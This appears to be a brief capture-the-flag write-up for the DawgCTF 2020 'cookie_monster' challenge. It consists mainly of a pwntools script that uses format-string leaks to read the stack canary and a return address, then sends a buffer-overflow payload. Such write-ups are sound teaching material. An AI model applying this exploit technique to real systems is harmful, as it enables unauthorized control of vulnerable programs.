Tags: stackcanary format-string pwn pwntools binaryexploitation ret2libc
Rating:
[detailed write up on github](https://github.com/shellc0d3/CTFwriteups/tree/master/dawgctf2020/cookie_monster)
```
#!/usr/bin/env python2
from pwn import *
import sys
if len(sys.argv) == 1:
conn = remote('ctf.umbccd.io', 4200)
else:
conn = process('./cookie_monster')
conn.sendlineafter('?', '%9$lx')
conn.recvuntil('Hello, ')
canary = p32(int(conn.recv(8), 16))
conn.close()
conn = process('./cookie_monster')
conn.sendlineafter('?', '%11$lx')
conn.recvuntil('Hello, ')
ret = p64(int(conn.recv(12), 16) - 0x19a)
payload = 'a'*13 + canary + 'a'*8 + ret
conn.sendlineafter('?', payload)
print conn.recvall()
conn.close()
```
